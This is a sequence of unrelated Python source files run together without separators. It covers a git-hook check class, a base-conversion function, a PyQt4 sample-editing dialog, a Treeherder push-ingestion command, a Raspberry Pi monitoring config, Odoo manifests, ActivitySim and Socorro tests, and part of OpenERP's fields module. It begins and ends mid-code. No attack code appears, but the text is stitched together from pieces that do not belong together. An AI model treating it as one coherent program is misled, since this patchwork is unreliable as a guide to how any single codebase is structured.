    def on_ok(self, *args):
        """Default no-op handler; real handling is attached via bind()."""

class CheckBase(object):
    """
    Base class for checks.

    Subclasses declare which git hooks they apply to via :attr:`hooks`
    and override :meth:`execute`.
    """

    # pylint: disable=W0105
    hooks = []
    """Git hooks to which this class applies. A list of strings."""

    def execute(self, hook):
        """
        Executes the check.

        :param hook: The name of the hook being run.
        :type hook: :class:`str`
        :returns: ``True`` if the check passed, ``False`` if not.
        :rtype: :class:`bool`

        """
        return None

#!/usr/bin/python3

### rev: 5.0
### author: <zhq>
### features:
###     errors included
###     up to 63 bases (2 to 64)
###     caps recognition and same output format (deprecated)
### for the function parameters, `cur` represents the current (input) base, `res` represents the result (output) base, and `num` represents the current (input) number.

def scale(cur, res, num):
    """Convert ``num`` from base ``cur`` to base ``res``.

    int, int, str -> str

    Digit alphabet (up to base 64): 0-9, A-Z (10-35), a-z (36-61),
    '@' (62), '_' (63). A leading '-' is preserved.

    :raises AssertionError: if a base is outside 2..64 or a digit is not
        valid in base ``cur``.
    """
    num = str(num)
    positive = True

    # Input validation / fast paths.
    if cur == res: return num
    if num == "0": return "0"
    assert cur in range(2, 65) and res in range(2, 65), "Base not defined."
    if num[0] == "-":
        positive = False
        num = num[1:]
    result = 0
    unit = 1

    if cur != 10:
        # Accumulate the decimal value from the least-significant digit up.
        for i in num[::-1]:
            value = ord(i)
            if value in range(48, 58): value -= 48
            elif value in range(65, 92): value -= 55
            elif value in range(97, 123): value -= 61
            elif value == 64: value = 62
            elif value == 95: value = 63
            # A digit must be strictly smaller than the base. (Fixed
            # off-by-one: the original used `value <= cur`, which accepted
            # e.g. digit "2" in base 2.)
            assert value < cur, "Digit larger than original base. v:%d(%s) b:%d\nCall: scale(%d, %d, %s)" % (value, i, cur, cur, res, num)
            result += value * unit
            unit *= cur
        result = str(result)

    # Output: repeatedly divide by the target base, emitting digits
    # most-significant first.
    if res != 10:
        num = int(result or num)
        result = ""
        while num > 0:
            num, value = divmod(num, res)
            if value < 10: digit = value + 48
            elif value < 36: digit = value + 55
            elif value < 62: digit = value + 61
            elif value == 62: digit = 64
            elif value == 63: digit = 95
            result = chr(digit) + result
    if not positive: result = "-" + result
    return result

# -*- coding: utf-8 -*-

# Form implementation generated from reading ui file 'events.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!

from PyQt4 import QtCore, QtGui
from collections import *
from functools import *
import os, glob
import pandas as pd

# pyuic4-generated compatibility shims: fall back gracefully on Qt/SIP
# builds where QString.fromUtf8 or QApplication.UnicodeUTF8 do not exist
# (e.g. SIP API v2), in which case strings pass through unchanged.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        return s

try:
    _encoding = QtGui.QApplication.UnicodeUTF8


    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)

class Ui_SamplesDialog(QtGui.QDialog):
    """Modal dialog for viewing, editing and deleting sample records.

    Reads *_SAMPLES.csv from ``datafolder`` into a pandas DataFrame and
    renders one grid row per sample: a radio selector, editable fields,
    combo boxes and Apply/Delete buttons. Edits are written back to the
    CSV; deletions also remove the sample's data files.
    """

    def __init__(self, parent=None, datafolder=None):
        """
        Constructor

        :param parent: optional parent widget.
        :param datafolder: folder holding the samples CSV, the data files
            and the "rawdata" subfolder.
        """
        QtGui.QDialog.__init__(self, parent)

        # self.filelist = filelist
        self.datafolder = datafolder

        # labels font
        self.font_labels = QtGui.QFont("Arial", 12, QtGui.QFont.Bold)
        self.font_edits = QtGui.QFont("Arial", 12)
        self.font_buttons = QtGui.QFont("Arial", 10, QtGui.QFont.Bold)


        # Build the UI and immediately run as a blocking modal dialog.
        self.setupUi(self)
        self.exec_()

    def setupUi(self, Dialog):
        """Create the grid layout and populate it with one row per sample."""
        Dialog.setObjectName(_fromUtf8("Dialog"))
        Dialog.resize(1000, 400)

        self.gridLayout = QtGui.QGridLayout(Dialog)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))

        # list of Events
        self.prepare_form(Dialog)

        self.retranslateUi(Dialog)
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def load_data(self):
        """Locate the samples CSV and read it into ``self.samplesdf``.

        NOTE(review): ``glob(...)[0]`` raises IndexError when no
        *_SAMPLES.csv exists, so the isfile() fallback below only triggers
        if the globbed file disappears in between — confirm intent.
        """
        print(self.datafolder)
        self.samplefile = glob.glob(os.path.join(self.datafolder, "*_SAMPLES.csv"))[0]
        if os.path.isfile(self.samplefile):
            self.samplesdf = pd.read_csv(self.samplefile, encoding='ISO-8859-1')
        else:
            print("File not found: ", self.samplefile)
            self.samplesdf = None

        # Fixed option lists for the combo boxes, keyed by column name.
        self.combodefaults = {'cuvette': ['600', '2000', '4000']}

    def prepare_form(self, Dialog):
        """(Re)build the whole sample grid from the current CSV contents."""
        # load or reload data
        self.load_data()

        # form dicts
        # Columns rendered as QLineEdits vs. QComboBoxes.
        edit_list = ['date', 'time', 'samplename', 'filename', 'smoothing', 'cal32', 'cal44', 'cons32', 'cons44',
                     'zero44', 'zero45', 'zero46', 'zero47', 'zero49']
        combo_list = ['user', 'membrane', 'cuvette']

        self.labels = defaultdict(defaultdict)
        self.edits = defaultdict(defaultdict)
        self.radios = defaultdict(defaultdict)
        self.combobox = defaultdict(defaultdict)
        self.labs = defaultdict(defaultdict)

        # Human-readable column titles.
        # NOTE(review): this literal immediately replaces the defaultdict
        # assigned just above.
        self.labs = {"time": "Time",
                     "date": "Date",
                     "samplename": "Sample Name",
                     "filename": "File Name",
                     "smoothing": "Smoothing",
                     "cuvette": "Cuvette",
                     "user": "User",
                     "membrane": "Membrane",
                     "cal44": "Calibration 44",
                     "cal32": "Calibration 32",
                     "cons32": "Consumption 32",
                     "cons44": "Consumption 44",
                     "zero32": "Zero 32",
                     "zero44": "Zero 44",
                     "zero45": "Zero 45",
                     "zero46": "Zero 46",
                     "zero47": "Zero 47",
                     "zero49": "Zero 49"}

        # Sorted so the per-row button order is deterministic (Apply, Delete).
        self.buttons = OrderedDict(sorted({'Apply': defaultdict(object), 'Delete': defaultdict(object)}.items()))

        # Grid coordinates: column 0 is the radio selector, row 0 the header.
        xpos, ypos = 1, 0
        for row in self.samplesdf.iterrows():
            row_index = row[0]
            r = row[1]

            self.radios[row_index] = QtGui.QRadioButton(Dialog)
            self.radios[row_index].setObjectName(_fromUtf8("_".join(["radio", str(row_index)])))
            self.gridLayout.addWidget(self.radios[row_index], ypos+1, 0, 1, 1)

            for k in ['samplename', 'date', 'time', 'cuvette']:
                # create labels
                # Header labels are created only while laying out the first row.
                if ypos == 0:
                    self.labels[k] = QtGui.QLabel(Dialog)
                    self.labels[k].setObjectName(_fromUtf8("_".join(["label", k])))
                    self.labels[k].setText(str(self.labs[k]))
                    self.labels[k].setAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter)
                    self.labels[k].setFont(self.font_labels)
                    self.gridLayout.addWidget(self.labels[k], 0, xpos, 1, 1)

                if k in edit_list:
                    self.edits[k][row_index] = QtGui.QLineEdit(Dialog)
                    self.edits[k][row_index].setObjectName(_fromUtf8("_".join(["edit", k, str(row_index)])))
                    self.edits[k][row_index].setText(str(r[k]))
                    self.edits[k][row_index].setFont(self.font_edits)

                    if k in ['time', 'date']:
                        self.edits[k][row_index].setFixedWidth(80)

                    self.gridLayout.addWidget(self.edits[k][row_index], ypos+1, xpos, 1, 1)

                elif k in combo_list:
                    self.combobox[k][row_index] = QtGui.QComboBox(Dialog)
                    self.combobox[k][row_index].setObjectName(_fromUtf8("_".join(["combo", k, str(row_index)])))
                    self.combobox[k][row_index].addItems(self.combodefaults[k])
                    self.combobox[k][row_index].setCurrentIndex(self.combobox[k][row_index].findText(str(r[k]), QtCore.Qt.MatchFixedString))
                    self.combobox[k][row_index].setFont(self.font_edits)
                    self.gridLayout.addWidget(self.combobox[k][row_index], ypos+1, xpos, 1, 1)

                xpos += 1

            # create buttons
            for k in self.buttons.keys():
                # if ypos > 0:
                    self.buttons[k][row_index] = QtGui.QPushButton(Dialog)
                    self.buttons[k][row_index].setObjectName(_fromUtf8("_".join(["event", k, "button", str(row_index)])))
                    self.buttons[k][row_index].setText(_translate("Dialog", k + str(row_index), None))
                    self.buttons[k][row_index].setFont(self.font_buttons)

                    # partial() bakes the row index and dialog into the slot.
                    if k == 'Apply':
                        self.buttons[k][row_index].clicked.connect(partial(self.ask_apply_changes, [row_index, Dialog]))
                        self.buttons[k][row_index].setStyleSheet("background-color: #ffeedd")

                    elif k == 'Delete':
                        self.buttons[k][row_index].clicked.connect(partial(self.ask_delete_confirm1, [row_index, Dialog]))
                        self.buttons[k][row_index].setStyleSheet("background-color: #ffcddd")

                    self.gridLayout.addWidget(self.buttons[k][row_index], ypos+1, xpos, 1, 1)
                    xpos += 1

            # increments
            ypos += 1
            xpos = 1
        # Grow the dialog with the number of sample rows.
        Dialog.resize(1000, 70 + (30 * ypos))


        # self.add_row(Dialog)

    def ask_delete_confirm1(self, args):
        """Two-step confirmation, then delete the selected sample.

        :param args: [row_index, Dialog], baked in via functools.partial.
        """
        sid = args[0]
        Dialog = args[1]

        # check if radio button is checked.
        if self.radios[sid].isChecked():
            msg = "Are you sure you want to delete the following sample :  \n\n"
            details = ""
            for c in self.samplesdf.columns:
                details += str(c) + ": " + str(self.samplesdf.at[sid, c]) + "\n"
            reply = QtGui.QMessageBox.warning(self, 'Confirmation #1',
                                           msg + details, QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)

            if reply == QtGui.QMessageBox.Yes:
                msg2 = "Are you sure REALLY REALLY sure you want to delete the following sample ? \n\n" + \
                       "This is the last confirmation message. After confirming, the files will be PERMANENTLY deleted and the data WILL be lost ! \n\n"

                msgbox = QtGui.QMessageBox.critical(self, 'Confirmation #2',
                               msg2 + details, QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No)


                reply2 = msgbox

                if reply2 ==  QtGui.QMessageBox.Yes:
                    # deletion confirmed
                    self.delete_confirmed(sid)
                    self.update_form( Dialog)

        else:
            QtGui.QMessageBox.question(self, 'Error', 'Please select the sample you want to delete on the left',
                                       QtGui.QMessageBox.Ok)

    def delete_confirmed(self, sid):
        """Drop row ``sid`` from the CSV and remove its data/rawdata files."""
        # sample file
        filename = self.samplesdf.loc[sid, 'filename']

        # delete row in samplesdf
        self.samplesdf = self.samplesdf.drop(self.samplesdf.index[sid])
        self.samplesdf.to_csv(self.samplefile, index=False, encoding='ISO-8859-1')

        # delete file in rawdata
        if os.path.isfile(os.path.join(self.datafolder, "rawdata", filename)):
            os.remove(os.path.join(self.datafolder, "rawdata", filename))
            # print(" delete: ", os.path.join(self.datafolder, "rawdata", filename))

        # delete file in data
        if os.path.isfile(os.path.join(self.datafolder, filename)):
            os.remove(os.path.join(self.datafolder, filename))
            # print(" delete: ", os.path.join(self.datafolder, filename))

    def ask_apply_changes(self, args):
        """Collect edited widget values for row ``sid`` and confirm applying them.

        :param args: [row_index, Dialog], baked in via functools.partial.
        """
        sid = args[0]
        Dialog = args[1]

        # Snapshot current widget values for this row.
        newdata=defaultdict(str)
        for k in self.edits.keys():
            newdata[k] = self.edits[k][sid].text()
        for k in self.combobox.keys():
            newdata[k] = self.combobox[k][sid].currentText()

        details = ""
        for k in newdata:
            details += str(self.samplesdf.at[sid, k]) + '\t --> \t' + str(newdata[k]) + "\n"

        msg = "Are you sure you want to apply the changes to sample " + str(self.samplesdf.at[sid, 'samplename']) + " ?\n\n"
        reply = QtGui.QMessageBox.question(self, 'Modify a sample', msg + details, QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)

        if reply == QtGui.QMessageBox.Yes:
            self.apply_changes_confirmed(sid, newdata)
            self.update_form(Dialog)
        else:
            print('cancel modification')

    def apply_changes_confirmed(self, sid, newdata):
        """Rename the sample's files to match the new name/date, then persist
        the edited values into the CSV."""
        # rename files
        newdata['filename'] = str(newdata['date']) + "_" + str(newdata['samplename']) + ".csv"
        os.rename(os.path.join(self.datafolder, str(self.samplesdf.at[sid, 'filename'])),
                  os.path.join(self.datafolder, str(newdata['filename'])))
        os.rename(os.path.join(self.datafolder, "rawdata", str(self.samplesdf.at[sid, 'filename'])),
                  os.path.join(self.datafolder, "rawdata", str(newdata['filename'])))

        # NOTE(review): to_csv() runs once per key inside the loop — could be
        # hoisted after the loop; confirm this is not intentional.
        for k in newdata.keys():
            self.samplesdf.at[sid, k] = newdata[k]
            self.samplesdf.to_csv(self.samplefile, index=False, encoding='ISO-8859-1')

    def update_form(self, Dialog):
        """Tear down all row widgets and rebuild the form from the CSV."""
        # empty variables
        self.edits = None
        self.combobox = None
        self.buttons = None
        self.radios = None
        self.labs = None
        self.labels = None

        # empty layout
        for i in reversed(range(self.gridLayout.count())):
            self.gridLayout.itemAt(i).widget().setParent(None)


        self.prepare_form(Dialog)

    def retranslateUi(self, Dialog):
        """Set translatable texts (window title)."""
        Dialog.setWindowTitle(_translate("Dialog", "Samples Manager", None))
        # self.label.setText(_translate("Dialog", "File", None))

from cProfile import Profile
from optparse import make_option

from django.conf import settings
from django.core.management.base import (BaseCommand,
                                         CommandError)

from treeherder.etl.buildapi import (Builds4hJobsProcess,
                                     PendingJobsProcess,
                                     RunningJobsProcess)
from treeherder.etl.pushlog import HgPushlogProcess
from treeherder.model.derived import RefDataManager


class Command(BaseCommand):

    """Management command to ingest data from a single push."""

    help = "Ingests a single push into treeherder"
    args = '<project> <changeset>'

    option_list = BaseCommand.option_list + (
        make_option('--profile-file',
                    action='store',
                    dest='profile_file',
                    default=None,
                    help='Profile command and write result to profile file'),

        make_option('--filter-job-group',
                    action='store',
                    dest='filter_job_group',
                    default=None,
                    help="Only process jobs in specified group symbol "
                    "(e.g. 'T')")
    )

    def _handle(self, *args, **options):
        """Ingest one (project, changeset) push.

        Resolves the repository, fetches its hg pushlog, then runs the
        builds4h/pending/running job processes filtered to that push.

        :raises CommandError: on wrong argument count or unknown project.
        """
        if len(args) != 2:
            raise CommandError("Need to specify (only) branch and changeset")

        (project, changeset) = args

        # get reference to repo. A list comprehension rather than filter():
        # on Python 3 filter() returns a lazy iterator, which is always
        # truthy (defeating the emptiness check) and not indexable.
        rdm = RefDataManager()
        repos = [repo_info for repo_info in rdm.get_all_repository_info()
                 if repo_info['name'] == project]
        if not repos:
            raise CommandError("No project found named '%s'" % project)
        repo = repos[0]

        # make sure all tasks are run synchronously / immediately
        settings.CELERY_ALWAYS_EAGER = True

        # get hg pushlog
        pushlog_url = '%s/json-pushes/?full=1&version=2' % repo['url']

        # ingest this particular revision for this project
        process = HgPushlogProcess()
        # Use the actual push SHA, in case the changeset specified was a tag
        # or branch name (eg tip). HgPushlogProcess returns the full SHA, but
        # job ingestion expects the short version, so we truncate it.
        push_sha = process.run(pushlog_url, project, changeset=changeset)[0:12]

        Builds4hJobsProcess().run(filter_to_project=project,
                                  filter_to_revision=push_sha,
                                  filter_to_job_group=options['filter_job_group'])
        PendingJobsProcess().run(filter_to_project=project,
                                 filter_to_revision=push_sha,
                                 filter_to_job_group=options['filter_job_group'])
        RunningJobsProcess().run(filter_to_project=project,
                                 filter_to_revision=push_sha,
                                 filter_to_job_group=options['filter_job_group'])

    def handle(self, *args, **options):
        """Entry point: run _handle(), optionally under cProfile."""
        if options['profile_file']:
            profiler = Profile()
            profiler.runcall(self._handle, *args, **options)
            profiler.dump_stats(options['profile_file'])
        else:
            self._handle(*args, **options)

#
# This is the configuration file for the RPi environd
#

### Presentation - General

# All datetime stamps use typical strftime codes: https://docs.python.org/2/library/datetime.html#strftime-strptime-behavior

# The date/time stamp of the last (most current) reading.
present_lastread_stamp = "%I:%M %p on %A, %b %d"

# How many decimal places to round to when displaying temperatures. For 
# presentation only - does not impact reading precision in the database.
present_temp_precision = 1


### Presentation - Recent Graph

# The date/time stamp on the x-axis
present_graph_recent_x = "%I:%M %p"

# How many data points to use. 
# This does _not_ reflect how many points will be drawn. Also consider how 
# often the readings are made - e.g., if a value is recorded every 15 minutes,
# then a full day's worth of data requires 24x(60/15) = 96 points.
present_recent_point_count = 720

# How much to reduce the specified number of data points. 
# This is how many points will be drawn. The value of 
# present_recent_point_count is divided into this many chunks, and then the
# time stamp and value of each chunk is averaged.
present_recent_reduce_to = 16

### Presentation - All Time Graph

# < tbd... not implemented yet > 

### Files

# The static html file that is output. Must be writable by the user running 
# environd. Presumably this is in the www directory of a web server.
www_out = "/var/www/environd.html"

# The template to use for generating static html.
# Must be readable by the user running environd.
html_template = "/opt/environd/template/environd.tpl"

# The (flat text) database file.
# Must be writable by the user running environd, and must exist, even if empty.
database = "/opt/environd/database/temperature_readings.json"

# The log file. Must be writable by the user running environd.
log_file = "/var/log/environd.log"

# Format of the timestamping used internally. 
# Does not impact presentation unless presented values are omitted.
datetime_func_format = "%Y%m%dT%H%M%S"


### Tinker/Debug

# Set to True to print all log messages to the terminal, or False to suppress 
# most output.
terminal_verbosity = True

# The size in mb after which the db file is rotated. 
# The entire db is loaded into memory, but each reading is a mere 60-80
# bytes, so 100 megs is about 10 years of recording every 15 minutes.
max_db_file_size = 100 # mb

# coding=utf-8

''' tagsPlorer package entry point  (C) 2021-2021  Arne Bachmann  https://github.com/ArneBachmann/tagsplorer '''

from tagsplorer import tp


# Guard the entry point so importing this module (e.g. from tests or
# multiprocessing workers) does not immediately launch the CLI; running
# the package directly still behaves as before.
if __name__ == "__main__":
    tp.Main().parse_and_run()
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.

from socorro.lib import datetimeutil
from socorro.unittest.external.es.base import (
    ElasticsearchTestCase,
    SuperSearchWithFields,
    minimum_es_version,
)

# Uncomment these lines to decrease verbosity of the elasticsearch library
# while running unit tests.
# import logging
# logging.getLogger('elasticsearch').setLevel(logging.ERROR)
# logging.getLogger('requests').setLevel(logging.ERROR)


class IntegrationTestAnalyzers(ElasticsearchTestCase):
    """Test the custom analyzers we create in our indices. """

    def setUp(self):
        """Create a field-aware SuperSearch API and a shared timestamp."""
        super(IntegrationTestAnalyzers, self).setUp()

        self.api = SuperSearchWithFields(config=self.config)
        self.now = datetimeutil.utc_now()

    @minimum_es_version('1.0')
    def test_semicolon_keywords(self):
        """Test the analyzer called `semicolon_keywords`.

        That analyzer creates tokens (terms) by splitting the input on
        semicolons (;) only.
        """
        # Two crashes whose app_init_dlls values share the '/path/to/dll'
        # token; the first also contains an empty token (';;').
        self.index_crash({
            'date_processed': self.now,
            'app_init_dlls': '/path/to/dll;;foo;C:\\bar\\boo',
        })
        self.index_crash({
            'date_processed': self.now,
            'app_init_dlls': '/path/to/dll;D:\\bar\\boo',
        })
        self.refresh_index()

        res = self.api.get(
            app_init_dlls='/path/to/dll',
            _facets=['app_init_dlls'],
        )
        # Both crashes match on the shared token; note the facet term for
        # 'C:\bar\boo' comes back lowercased ('c:\bar\boo').
        assert res['total'] == 2
        assert 'app_init_dlls' in res['facets']
        facet_terms = [x['term'] for x in res['facets']['app_init_dlls']]
        assert '/path/to/dll' in facet_terms
        assert 'c:\\bar\\boo' in facet_terms
        assert 'foo' in facet_terms

"""Django module for the OS2datascanner project."""

# -*- coding: utf-8 -*-
# © 2009 Pexego/Comunitea
# © 2011-2012 Iker Coranti (www.avanzosc.es)
# © 2014 Juanjo Algaz (gutierrezweb.es)
# © 2014-2016 Pedro M. Baeza
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl-3.0).

# Odoo addon manifest: metadata, dependencies, and data/view files for the
# account balance reporting engine module (evaluated by Odoo, not imported).
{
    "name": "Account balance reporting engine",
    "version": "8.0.1.2.0",
    "author": "Pexego, "
              "AvanzOSC, "
              "Tecnativa, "
              "Odoo Community Association (OCA)",
    "website": "http://www.pexego.es",
    "category": "Accounting & Finance",
    "contributors": [
        "Juanjo Algaz <juanjoa@malagatic.com>",
        "Joaquín Gutierrez <joaquing.pedrosa@gmail.com>",
        "Pedro M. Baeza <pedro.baeza@tecnativa.com>",
        "Oihane Crucelaegui <oihanecrucelaegi@avanzosc.es>",
    ],
    "license": 'AGPL-3',
    "depends": [
        "account",
    ],
    "data": [
        "security/ir.model.access.csv",
        "views/account_account_view.xml",
        "views/account_balance_reporting_template_view.xml",
        "views/account_balance_reporting_report_view.xml",
        "views/account_balance_reporting_menu.xml",
        "report/account_balance_reporting_reports.xml",
        "report/report_generic.xml",
        "wizard/wizard_print_view.xml",
    ],
    "installable": True,
}

# -*- coding:utf-8 -*-
#
#
#    Copyright (C) 2013 Michael Telahun Makonnen <mmakonnen@gmail.com>.
#    All Rights Reserved.
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as published
#    by the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
#

# Odoo addon manifest: metadata, dependencies, and asset/data files for the
# webcam capture module (evaluated by Odoo, not imported).
{
    'name': 'Capture picture with webcam',
    'version': '1.0',
    'category': 'Generic Modules/Human Resources',
    'description': """
TApplicant WebCam
=========

Capture employee pictures with an attached web cam.
    """,
    'author': "Michael Telahun Makonnen <mmakonnen@gmail.com>,"
    "Odoo Community Association (OCA)",
    'website': 'http://miketelahun.wordpress.com',
    'license': 'AGPL-3',
    'depends': [
        'hr',
        'web',
        'trip'
    ],
    'js': [
        'static/src/js/jquery.webcam.js',
        'static/src/js/tapplicant_webcam.js',
    ],
    'css': [
        'static/src/css/tapplicant_webcam.css',
    ],
    'qweb': [
        'static/src/xml/tapplicant_webcam.xml',
    ],
    'data': [
        'tapplicant_webcam_data.xml',
        'tapplicant_webcam_view.xml',
    ],
    'installable': True,
    'active': False,
}

# ActivitySim
# Copyright (C) 2014-2015 Synthicity, LLC
# See full license in LICENSE.txt.

import os.path

import numpy as np
import pandas as pd
import pandas.util.testing as pdt
import pytest

from ..activitysim import eval_variables
from .. import mnl


# this is lifted straight from urbansim's test_mnl.py
# this is lifted straight from urbansim's test_mnl.py
@pytest.fixture(scope='module', params=[
    ('fish.csv',
        'fish_choosers.csv',
        pd.DataFrame(
            [[-0.02047652], [0.95309824]], index=['price', 'catch'],
            columns=['Alt']),
        pd.DataFrame([
            [0.2849598, 0.2742482, 0.1605457, 0.2802463],
            [0.1498991, 0.4542377, 0.2600969, 0.1357664]],
            columns=['beach', 'boat', 'charter', 'pier']))])
def test_data(request):
    """Bundle one parametrized (data, choosers, spec, probabilities) case."""
    keys = ('data', 'choosers', 'spec', 'probabilities')
    return dict(zip(keys, request.param))


@pytest.fixture
def choosers(test_data):
    """Load the choosers CSV from this test module's data directory."""
    data_dir = os.path.join(os.path.dirname(__file__), 'data')
    return pd.read_csv(os.path.join(data_dir, test_data['choosers']))


@pytest.fixture
def spec(test_data):
    """Coefficient spec DataFrame for the current parametrization."""
    return test_data['spec']


@pytest.fixture
def choosers_dm(choosers, spec):
    """Design matrix: evaluate each spec expression against the choosers."""
    return eval_variables(spec.index, choosers)


@pytest.fixture
def utilities(choosers_dm, spec, test_data):
    """Utility matrix reshaped to match the expected probabilities.

    Uses ``.values`` instead of ``as_matrix()``: ``DataFrame.as_matrix``
    was deprecated in pandas 0.23 and removed in 1.0, so the original
    call raises AttributeError on any modern pandas.
    """
    utils = choosers_dm.dot(spec).astype('float')
    return pd.DataFrame(
        utils.values.reshape(test_data['probabilities'].shape),
        columns=test_data['probabilities'].columns)


def test_utils_to_probs(utilities, test_data):
    """utils_to_probs should reproduce the reference probabilities."""
    result = mnl.utils_to_probs(utilities)
    pdt.assert_frame_equal(result, test_data['probabilities'])


def test_utils_to_probs_raises():
    """Non-finite utilities must be rejected with a RuntimeError."""
    bad_utils = pd.DataFrame([[1, 2, np.inf, 3]])
    with pytest.raises(RuntimeError):
        mnl.utils_to_probs(bad_utils)


def test_make_choices_only_one():
    """Degenerate probabilities (a single 1 per row) force that choice."""
    probs = pd.DataFrame(
        [[1, 0, 0], [0, 1, 0]], columns=['a', 'b', 'c'], index=['x', 'y'])
    expected = pd.Series([0, 1], index=['x', 'y'])

    pdt.assert_series_equal(mnl.make_choices(probs), expected)


def test_make_choices_real_probs(random_seed, utilities):
    """With a fixed seed, sampling from real probabilities is reproducible."""
    choices = mnl.make_choices(mnl.utils_to_probs(utilities))
    expected = pd.Series([1, 2], index=[0, 1])

    pdt.assert_series_equal(choices, expected)


@pytest.fixture(scope='module')
def interaction_choosers():
    """Four choosers ('w'..'z') with one categorical attribute each."""
    chooser_ids = ['w', 'x', 'y', 'z']
    return pd.DataFrame({'attr': ['a', 'b', 'c', 'b']}, index=chooser_ids)


@pytest.fixture(scope='module')
def interaction_alts():
    """Four alternatives (1..4) with one numeric property each."""
    alt_ids = [1, 2, 3, 4]
    return pd.DataFrame({'prop': [10, 20, 30, 40]}, index=alt_ids)


def test_interaction_dataset_no_sample(interaction_choosers, interaction_alts):
    """Without sampling, every chooser is crossed with every alternative."""
    expected = pd.DataFrame({
        'attr': ['a'] * 4 + ['b'] * 4 + ['c'] * 4 + ['b'] * 4,
        'prop': [10, 20, 30, 40] * 4,
        'chooser_idx': ['w'] * 4 + ['x'] * 4 + ['y'] * 4 + ['z'] * 4},
        index=[1, 2, 3, 4] * 4)

    actual = mnl.interaction_dataset(interaction_choosers, interaction_alts)

    # Column order is not significant; align before comparing.
    actual, expected = actual.align(expected, axis=1)
    pdt.assert_frame_equal(actual, expected)


def test_interaction_dataset_sampled(
        interaction_choosers, interaction_alts, random_seed):
    # With sample_size=2, each chooser is paired with 2 sampled alternatives.
    # The expected rows below are determined by the pinned random_seed.
    expected = pd.DataFrame({
        'attr': ['a'] * 2 + ['b'] * 2 + ['c'] * 2 + ['b'] * 2,
        'prop': [30, 40, 10, 30, 40, 10, 20, 10],
        'chooser_idx': ['w'] * 2 + ['x'] * 2 + ['y'] * 2 + ['z'] * 2},
        index=[3, 4, 1, 3, 4, 1, 2, 1])

    interacted = mnl.interaction_dataset(
        interaction_choosers, interaction_alts, sample_size=2)

    # align column order before comparing; only the contents matter
    interacted, expected = interacted.align(expected, axis=1)
    pdt.assert_frame_equal(interacted, expected)

# -*- coding: utf-8 -*-
##############################################################################
#
#    OpenERP, Open Source Management Solution
#    Copyright (C) 2013-2014 OpenERP (<http://www.openerp.com>).
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################

""" High-level objects for fields. """

from collections import OrderedDict
from datetime import date, datetime
from functools import partial
from operator import attrgetter
from types import NoneType
import logging
import pytz
import xmlrpclib

from openerp.tools import float_round, frozendict, html_sanitize, ustr, OrderedSet
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT as DATE_FORMAT
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT as DATETIME_FORMAT

DATE_LENGTH = len(date.today().strftime(DATE_FORMAT))
DATETIME_LENGTH = len(datetime.now().strftime(DATETIME_FORMAT))
EMPTY_DICT = frozendict()

_logger = logging.getLogger(__name__)

class SpecialValue(object):
    """ Encapsulates a value in the cache in place of a normal value. """

    def __init__(self, value):
        self.value = value

    def get(self):
        """ Return the wrapped value. """
        return self.value

class FailedValue(SpecialValue):
    """ Special value that encapsulates an exception instead of a value. """
    def __init__(self, exception):
        # deliberately does not call SpecialValue.__init__: there is no
        # normal value to wrap, only an exception to re-raise
        self.exception = exception
    def get(self):
        # reading a failed value re-raises the original exception
        raise self.exception

def _check_value(value):
    """ Return ``value``, or call its getter if ``value`` is a :class:`SpecialValue`. """
    if isinstance(value, SpecialValue):
        return value.get()
    return value


def resolve_all_mro(cls, name, reverse=False):
    """ Return the (successively overridden) values of attribute ``name`` in ``cls``
        in mro order, or inverse mro order if ``reverse`` is true.
    """
    mro = reversed(cls.__mro__) if reverse else cls.__mro__
    for klass in mro:
        klass_dict = klass.__dict__
        if name in klass_dict:
            yield klass_dict[name]


class MetaField(type):
    """ Metaclass for field classes. """
    by_type = {}

    def __new__(meta, name, bases, attrs):
        """ Combine the ``_slots`` dict from parent classes, and determine
        ``__slots__`` for them on the new class.
        """
        # slots inherited from the bases, last base taking lowest priority
        inherited = {}
        for parent in reversed(bases):
            inherited.update(getattr(parent, '_slots', ()))

        combined = dict(inherited)
        combined.update(attrs.get('_slots', ()))

        # only the slots new to this class become actual __slots__ entries
        attrs['_slots'] = combined
        attrs['__slots__'] = set(combined) - set(inherited)
        return type.__new__(meta, name, bases, attrs)

    def __init__(cls, name, bases, attrs):
        super(MetaField, cls).__init__(name, bases, attrs)
        # register the first class defined for each field type
        if cls.type and cls.type not in MetaField.by_type:
            MetaField.by_type[cls.type] = cls

        # compute class attributes to avoid calling dir() on fields
        cls.column_attrs = []
        cls.related_attrs = []
        cls.description_attrs = []
        buckets = (('_column_', cls.column_attrs),
                   ('_related_', cls.related_attrs),
                   ('_description_', cls.description_attrs))
        for attr in dir(cls):
            for prefix, bucket in buckets:
                if attr.startswith(prefix):
